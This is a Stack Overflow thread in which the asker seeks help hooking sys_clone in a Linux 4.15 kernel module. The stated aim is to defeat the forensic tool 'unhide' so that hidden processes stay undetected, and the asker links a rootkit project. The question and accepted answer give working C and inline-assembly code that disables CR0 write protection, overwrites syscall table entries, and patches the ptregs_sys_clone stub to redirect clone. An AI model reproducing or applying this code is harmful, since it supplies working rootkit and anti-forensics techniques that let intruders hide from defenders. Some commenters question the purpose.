# How to hook sys_clone in newer Linux Kernel

Tags: c, assembly, linux-kernel, hook, clone

I am trying to hook `sys_clone`, to bypass a method used by the tool `unhide` http://www.unhide-forensics.info/. The idea is to translate PIDs from real to fake, and fake to real, making the tool to see the hidden PIDs and the not hidden as continuous identifiers.
I mean, this tool forks continuously and checks if in all the loops there's some PID that is busy and it's not visible.
The idea es to cheat this tool by giving continuous PIDs.

The problem, is that when a program executes my hook handler for `sys_clone`, after returning, wait(&status) gives a signal of SEGVFAULT.

I'm following the same method that I'm using to hook all other syscalls, including `sys_fork`, `sys_vfork` and the others syscalls.

`sys_vfork` and `sys_fork` uses the same function `_do_fork()` to create the new process: 
https://elixir.bootlin.com/linux/v4.15.1/source/kernel/fork.c#L2148

https://elixir.bootlin.com/linux/v4.15.1/source/kernel/fork.c#L2111

https://elixir.bootlin.com/linux/v4.15.1/source/kernel/fork.c#L2123

**EDITED**:
I created a minimal working example, reproducing the bug, so you can test it better, and sorry because I didn't before:

```
#include <linux/module.h>
#include <linux/uaccess.h>

void **sys_call_table = NULL;
asmlinkage long (*sys_read)(long a1, long a2, long a3, long a4, long a5, long a6) = NULL;
asmlinkage long (*sys_clone)(long a1, long a2, long a3, long a4, long a5, long a6) = NULL;
asmlinkage long my_clone64(long a1, long a2, long a3, long a4, long a5, long a6);

char *sct_str;

module_param(sct_str, charp, 0);

inline void disable_wp(void) {
        asm("cli\n\tmov\t%cr0, %rax\n\tand\t$0xfffffffffffeffff, %rax\n\tmov\t%rax, %cr0\n\tsti");
}

inline void enable_wp(void) {
        asm("cli\n\tmov\t%cr0, %rax\n\tor\t$0x10000, %rax\n\tmov\t%rax, %cr0\n\tsti");
}

int init_module(void) {
        int ret = 0;
        mm_segment_t old_fs;

        kstrtoul(sct_str, 16, (unsigned long *) &sys_call_table);
        printk("%lx\n", sys_call_table);

        if (!sys_call_table) {
                return -1;
        }

        sys_read = sys_call_table[__NR_read];
        sys_clone = sys_call_table[__NR_clone];

        // hook sys_clone
        printk("be\n");
        disable_wp();
        sys_call_table[__NR_clone] = my_clone64;
        enable_wp();
        printk("af\n");

        // wait user's ENTER
        old_fs = get_fs();
        set_fs(KERNEL_DS);
        sys_read(0, (long)&ret, 1, 0, 0, 0);
        set_fs(old_fs);

        // restore sys_clone
        disable_wp();
        sys_call_table[__NR_clone] = sys_clone;
        enable_wp();

        return -1;
}

void cleanup_module(void) {
}


asmlinkage long my_clone64(long a1, long a2, long a3, long a4, long a5, long a6) {
        long ret = 0;
        printk("pid = %d\n", ret);
        ret = sys_clone(a1, a2, a3, a4, a5, a6);
        return ret;
}

MODULE_LICENSE("GPL");
```

Use this `Makefile` to compile:

```
obj-m += so.o

KERNEL_HEADERS = /lib/modules/$(shell uname -r)/build

all:
        make V=1 -C $(KERNEL_HEADERS) M=$(PWD) modules

clean:
        make V=1 -C $(KERNEL_HEADERS) M=$(PWD) clean
```

Compile with `make` and to load do:

```
diwou@diwou-VirtualBox:~/arpso$ sudo grep sys_call_table /proc/kallsyms
ffffffff9de00180 R sys_call_table
ffffffff9de01540 R ia32_sys_call_table
diwou@diwou-VirtualBox:~/arpso$ sudo insmod so.ko sct_str="ffffffff9de00180"
[NOW PRESS ENTER TO UNHOOK]
insmod: ERROR: could not insert module so.ko: Operation not permitted
diwou@diwou-VirtualBox:~/arpso$
```

The `Operattion not permitted` is due to the return code I use (`-1`) to automatically unload the module.

Here is the output from the other session, when `sys_clone` is hooked. And I run `/bin/ls`:

```
diwou@diwou-VirtualBox:~$ ls
Violación de segmento (`core' generado)
```

After unhook `sys_clone` (by pressing ENTER) the command `ls` works again.

**EDIT:**
If you replace `my_clone64` by the following code, it happens the same. But if you change `call` by `jmp` it works:

```
asm(
".globl my_clone64\n\t"
".type my_clone64, @function\n"
"my_clone64:\n\t"
"call sys_clone(%rip)\n\t"
// do something with %rax
"ret\n\t"
".size my_clone64, .-my_clone64\n\t"
);
```

That points to some kind of implementation in the Linux Kernel... am I right?

**EDIT:**
It's interesting that when I run `strace -f bash` in one ssh session, and `read(0,` waits for my input, then I load the LKM in another session, and I write `ls` in the `bash` being traced, and it works. I can see the output of the  `ls` command.
But if I open an ssh session, I load the LKM, and write `ls` on the `bash` without being traced, just a common ssh session, the output is segmentation fault:

```
clone(strace: Process 3233 attached
child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x7fa5f68be9d0) = 3233
[...]
[pid  3233] stat("arpso", {st_mode=S_IFDIR|0775, st_size=4096, ...}) = 0
[pid  3233] open("arpso", O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC) = 3
[pid  3233] fstat(3, {st_mode=S_IFDIR|0775, st_size=4096, ...}) = 0
[pid  3233] getdents(3, /* 15 entries */, 32768) = 480
[pid  3233] lstat("arpso/so.c", {st_mode=S_IFREG|0664, st_size=1575, ...}) = 0
[pid  3233] lstat("arpso/so.ko", {st_mode=S_IFREG|0664, st_size=5760, ...}) = 0
[pid  3233] lstat("arpso/modules.order", {st_mode=S_IFREG|0664, st_size=31, ...}) = 0
[pid  3233] lstat("arpso/Module.symvers", {st_mode=S_IFREG|0664, st_size=0, ...}) = 0
[pid  3233] lstat("arpso/so.o", {st_mode=S_IFREG|0664, st_size=5440, ...}) = 0
[pid  3233] lstat("arpso/so.mod.o", {st_mode=S_IFREG|0664, st_size=2528, ...}) = 0
[pid  3233] lstat("arpso/so.mod.c", {st_mode=S_IFREG|0664, st_size=542, ...}) = 0
[pid  3233] lstat("arpso/Makefile", {st_mode=S_IFREG|0664, st_size=177, ...}) = 0
[pid  3233] getdents(3, /* 0 entries */, 32768) = 0
[pid  3233] close(3)                    = 0
[...]
+++ exited with 0 +++
diwou@diwou-VirtualBox:~$ ls
Violación de segmento (`core' generado)
diwou@diwou-VirtualBox:~$
```

Any help would be appreciated.

Thanks.

Comment: _I am trying to hook [syscalls]_ — You're not supposed to do that. Seriously. In order to get this far you must have hacked around several different mechanisms that exist specifically to _prevent_ you from doing that, and it's very likely that you broke something in the process. Back up a level and describe your larger goals and maybe we can help you with _those_.

Comment: @zwol I'm an IT Security Researcher. My job is to find ways of hacking systems to make them more secure. If you want to help do it. If you don't just you shouldn't comment.

Comment: I'm trying to help by explaining to you that you have bent the Linux kernel well outside its design specifications already, therefore it's not surprising that it crashes, and there is probably a better way to do what you want.  You are in the "[XY problem](https://meta.stackexchange.com/questions/66377/what-is-the-xy-problem)" cognitive trap.

Comment: I understand. But the true is that I am able to hide processes, to run a revershel shell, to patch the kernel and something more. Everything works stable. The problem is only related on the hook of sys_clone. I think I was clear on the post. Saying and sharing only the part which is crashing. Because if I remove the hook of sys_clone, everything works fine. So, what I think is that there's something different related to sys_clone. Because Kernel is not an script, it's ok or it's not ok.

Comment: I don't know which level to go down to show you're wrong.

Comment: You could be right.  But I think it is more likely that `clone` is especially sensitive to whatever it was you did wrong in the code you haven't shown us.  Regardless, I don't want you to go down any more levels, I want you to go _up_ a few levels and explain what you are trying to accomplish by hooking clone in the first place.

Comment: You have the whole code in github. Check it, try it, do whatever you need to, and tell me what's wrong if you can. Please.

Comment: https://github.com/D1W0U/ARP-RootKit

Comment: A code dump does not tell me what you are trying to accomplish.  You have to use words in a natural language for that.

Comment: I'm trying to hook sys_clone. And my question is, knowing I've succesfully hooked more than 20 syscalls in the project, also sys_fork and sys_vfork that just call _do_fork, why sys_clone doesn't work. Just that.

Comment: You wrap target function call with `set_fs(KERNEL_DS);` / `set_fs(old_fs);`, this changes interpretation of the pointers passed as syscall parameters. Because neither `fork` nor `vfork` has parameters, such wrapping doesn't affect on them. But `clone64` **has parameters**, so you actually modify syscall's behaviour. Really, you use a wrapping mechanism, but doesn't know what it does?

Comment: But WHY are you trying to hook sys_clone? I still don't understand what the point of this exercise is.

Comment: It's hard to answer this question (despite its importance or ontological issues). You made some arbitrary, and *not* documented in the question, changes to the Linux kernel. You found a problem that was described generically as "segmentation fault". The code presented seems problematic: are the C types correct? Why swapping `fs` when the modern kernel uses `gs`? Have you considered KPTI? Have you took a look at [entry_64.S](https://elixir.bootlin.com/linux/v4.16-rc2/source/arch/x86/entry/entry_64.S) and [common.c](https://elixir.bootlin.com/linux/v4.15.1/source/arch/x86/entry/common.c#L268)?

Comment: Take a look [here](https://0xax.gitbooks.io/linux-insides/content/SysCall/syscall-2.html) in case you need to brush up on how syscalls work on 64-bit systems. The ABI is different `rcx` is used by `syscall`. Too much is missing in the question to understand how to answer it.

Comment: I think people are downvoting this question because it's not totally clear exactly what you did (or more importantly why).  Your problem is kind of too big to summarize into a good SO question.  This doesn't seem like a very good [mcve].  Nobody has said anything about downvoting because they oppose white-hat hacking.

Comment: @Tsyvarev If you see, the SYSCALL64 macro uses value 1 in parameter user, and the function only uses my_set_fs and my_get_fs when user is 0.

Comment: @zwol I want to bypass the method to detect hidden PIDs used by `unhide` tool: http://www.unhide-forensics.info/

Comment: @MargaretBloom I can't post a whole month of development by the method I am using to be able to hook syscalls. But I can tell you that I create my own syscall table and I patch the kernel. The segmentation fault is given by the future command executions in bash. The kernel remains working. Which types are wrong? The kernel uses long for every parameter on x86_64 in syscalls. I don't swap in this case, because user parameter is 1. No I don't know what is KPTI. Maybe there's something of interest on those files to solve the problem.

Comment: @MargaretBloom maybe the problem is in `rcx`. That it returns to the incorrect address. I'm trying to improve the question and give more information.

Comment: @PeterCordes Okay. Thanks for your opinion. I'm updating the question.

Comment: But is bash or some other process *actually* receiving a SIGSEGV because your changes created a bad address in user-space?  Or does a system call return `-EFAULT` because of your changes?

Comment: @AbelRomeroPérez: In that discussion I am on the side with PeterCordes. You want to hook syscalls. You say **you know** that you are doing something unusual. OK. Then you should be ready to **debug hard**. I see, you have already done some part of debugging. Nice. But for ask on Stack Overflow you need more - you need [mcve]. Remove all *unnecessary* code and simplifies the rest as you can. Is replacing `SYSCALL64()` to `sys_clone()` in `my_clone64` implementation works? If no, then drop `SYSCALL64` completely. If yes, check that you finally call `sys_clone` with proper parameters. And so on.

Comment: @PeterCordes Are the processes opened with clone() on the bash already executing before to load the rootkit. I mean: I have 2 bash with PuTTY, I load the rootkit in one session, and in the other I type: ls. Then it says Segmentation fault code dumped. I unload the rootkit in the other session. I re-type ls in the other, and it works.

Comment: @Tsyvarev Ok. But SYSCALL64 is the way to call the original syscall. I cloned the syscall tables and have 2 for the 64bit one and 2 for the 32bit compat. I patch the .text section to replace references to original and I patch with cloned ones. Then I use SYSCALL64 and `syscall` macro and function, respectively, to call those originals from `sys_call_table`. `my_sct` is the cloned one, where I do the hooking.

Comment: I understand that you need SYSCALL64 for your *real work*. But first you should check, that hook mechanism itself is working. That is why I ask you to replace `SYSCALL64()` call in your `my_clone64` implementation to `sys_clone()` call. Such way you will check that hooking works. If hooking doesn't work, then `SYSCALL64` is useless (at least, for `clone` syscall). If hooking works, then the problem in `SYSCALL64`. But as there is no asm code in your `SYSCALL64` implementation, you needn't to bother about wrong registers or so - you need just to check that you pass correct parameters.

Comment: @Tsyvarev okay, I just created a minimal example reproducing the error. Please check it. I updated the question. It's easy to get it working and reproduces the error in my real project.

Comment: Nice. Am I right, that in the updated example you don't use technique with patching the kernel's `.text` section, which  you have described in your previous comment? As the questions now has an example focused on the problem, I have voted for reopen it. (It is required 4 other votes for the question being completely opened, so answers can be written. But comments works anywhere.)

Comment: Yes you are right, in the updated question I don't use the same method of hooking syscalls, because I tried with a simple minimal verification example, and the problem is the same, and giving a complete example in the same way I do in my real project would be a lot of work. But it's the same scenario. Something is wrong in `_do_fork` or I must do something with stack when calling original `sys_clone` from the handler. Thanks.

Comment: Use `strace` and/or `gdb` on the bash process which is trying to fork `ls` to see what gets messed up that causes it to segfault.  Or if some system call is returning `-EFAULT` and there's no actual out-of-bounds memory access in user-space.

Comment: Also, run in a VM with kernel debugging if needed.

Comment: @PeterCordes As I can not spawn commands when the hook is installed, I must run the `strace bash` before. Then I run `ls`, and sometimes works. Other times says that `wait` received a `SIGSEGV`. I'm going to update the question for you to see that is some kind of implementation in the linux kernel, with the use of `_do_fork()` function. I think they implemented in the way that it can't be another call between `sys_clone` and `_do_fork`. Also all the functions that call `_do_fork` return inmediatly, there are no more calls.

Comment: @Jester That is my last option. Now, I'm going to try to make a trampoline to `_do_fork` because I think there's some kind of implementation in the Linux Kernel that forces the need to call `_do_fork` only in one nested call.

Comment: Use `strace -f` on bash to follow forks, so if it succeeds at all, the already-running strace will follow it.  IDK if GDB has a similar option to debug child processes.  If you ran `sleep 60`, you could try attaching to it from an already-running GDB, but probably it segfaults before it could make a sleep system call.

Comment: @PeterCordes ok, I will try with `strace -f` to see what outputs. In GDB there's `set follow-fork-mode parent|child` if I don't remember bad.

Comment: @PeterCordes I've updated the question with the result of your suggestion. You now can know what happens with and without `strace -f`.

Comment: So when running under `strace -f`, bash works fine even when your module is loaded?  Looks like you've encountered a Heisenbug: a bug that only happens when you're not looking.  Inside the kernel, system call tracing does run a bunch of extra code, so maybe it's fixing something you break, or it just happens to work.

Comment: @PeterCordes Yes, when running under `strace -f`, `bash`, works fine even my module is loaded. Oh that sounds interesting. So do you think that the problem because I can not hook `sys_clone` is because there's a bug in `_do_fork` ? I think it's `copy_process` the responsible to break it. And I think it happens when the `clone` includes a new stack. Should I contact Linux Kernel developers?

Comment: No, I've tested it printk-ing the address of newsp and it's called with 0 value and it crashes.

Answer (score 1, accepted):

I found the answer.

Just the problem of common hooking (aka replace syscall handlers in syscall table) is that actually (in the kernel 4.15.1 at least), there's defined an extra symbol called `ptregs_sys_clone`, which makes some tricks to finally `call/jmp` to `sys_clone`. And nesting calls is not an option, since the retaddr is checked to go from one path or another... so the solution I found, is to replace the reference to `sys_clone` in `ptregs_sys_clone`.

The code as follows.

core.c

```
#include <linux/uaccess.h>

void **sys_call_table = NULL;
asmlinkage long (*sys_read)(long a1, long a2, long a3, long a4, long a5, long a6) = NULL;
asmlinkage long (*ptregs_sys_clone)(struct pt_regs *regs) = NULL;
asmlinkage long (*sys_clone)(long a1, long a2, long a3, long a4, long a5, long a6) = NULL;
asmlinkage long my_clone64(long a1, long a2, long a3, long a4, long a5, long a6);

extern char *sct_str;

void disable_wp(void) {
        asm("cli\n\tmov\t%cr0, %rax\n\tand\t$0xfffffffffffeffff, %rax\n\tmov\t%rax, %cr0\n\tsti");
}

void enable_wp(void) {
        asm("cli\n\tmov\t%cr0, %rax\n\tor\t$0x10000, %rax\n\tmov\t%rax, %cr0\n\tsti");
}

int patch_ptregs_syscall(void *addr, long newaddr, long *oldaddr) {
        int i = 0, ret = 0, *p = NULL;
        long vaddr = 0; // variable address

        p = addr + 3; // point to offset in: lea offset(%rip), %register
        //printk("value before patch = %lx\n", *p);
        vaddr = (long)*p + addr + 7; // offset + %rip + lea' size
        if (oldaddr) {
                *oldaddr = vaddr;
        }
        printk("address %lx, ofsset %lx\n", vaddr, *p);
        vaddr = newaddr - (long)addr - 7;
        printk("new address %lx, new offset %lx\n", newaddr, vaddr);
        disable_wp();
        ret = probe_kernel_write(p, &vaddr, sizeof(int));
        enable_wp();
        if (ret != 0) {
                return -2;
        }

        return 0;
}

int install_hooks(void) {
        int ret = 0;
        mm_segment_t old_fs;

        if (!sct_str) {
                return -2;
        }

        kstrtoul(sct_str, 16, (unsigned long *) &sys_call_table);
        printk("sct: %lx\n", sys_call_table);

        if (!sys_call_table) {
                return -2;
        }

        sys_read = sys_call_table[__NR_read];
        ptregs_sys_clone = sys_call_table[__NR_clone];

        // hook sys_clone
        patch_ptregs_syscall(ptregs_sys_clone, (long)my_clone64, (long *)&sys_clone);

        // wait user's ENTER
        old_fs = get_fs();
        set_fs(KERNEL_DS);
        sys_read(0, (long)&ret, 1, 0, 0, 0);
        set_fs(old_fs);

        // restore sys_clone
        patch_ptregs_syscall(ptregs_sys_clone, (long)sys_clone, NULL);

        return -1;
}

asmlinkage long my_clone64(long a1, long a2, long a3, long a4, long a5, long a6) {
        pid_t pid = 0;

        pid = sys_clone(a1, a2, a3, a4, a5, a6);
        printk("pid %d\n", pid);
        return pid;
}
```

main.c:

```
#include <linux/module.h>

extern int install_hooks(void);

char *sct_str;

module_param(sct_str, charp, 0);

int init_module(void) {
        return install_hooks();
}

void cleanup_module(void) {
}

MODULE_LICENSE("GPL");
```

Makefile

```
obj-m += so.o

so-objs := main.o core-asm.o

EXTRA_CFLAGS := -O0

KERNEL_HEADERS = /lib/modules/$(shell uname -r)/build

all:
        make V=1 -C $(KERNEL_HEADERS) M=$(PWD) core.s
        gcc -c core.s -o core-asm.o
        make V=1 -C $(KERNEL_HEADERS) M=$(PWD) modules

clean:
        make V=1 -C $(KERNEL_HEADERS) M=$(PWD) clean
```

Good luck, and thanks for all your comments & help.

Comment: Another option might be to tail-call the function with `jmp sys_clone`, rather than `call sys_clone` / `ret`.  So the stack would be in the same state, with your caller as the caller seen by `sys_clone`.

Comment: Yeah, that's useful if you don't need to get the new process `pid`. But I need to catch it. Another option I'm trying is to fix stack for be able to call `sys_clone` from `ptregs_sys_clone` in newer kernels, and `stub_sys_clone` in older. But still researching =)

Comment: The example in your question doesn't show you doing anything with the return value.  I guess your real code has more instructions between the `call` and the `ret`.

Comment: I'm going to fix the question. You're right. But in the answer I used... anyway I fix it. Yes, as I said the project is more big than the given here, I had to do a minimal verificable example because I was getting too much -1. In the real project I have nothing related to `sys_clone` hooking because I was developing it on the minimal verificable example. But I just returned directly from hook handler, to be cleaner in the problem: that common hooking way doesn't work, even simpler hook handler.

Comment: Yup, just add a comment into the MCVE like `"# do something with the PID in eax before returning\n\t"`

Comment: It's `stub_clone` not `stub_sys_clone` on Linux Kernel v4.0.1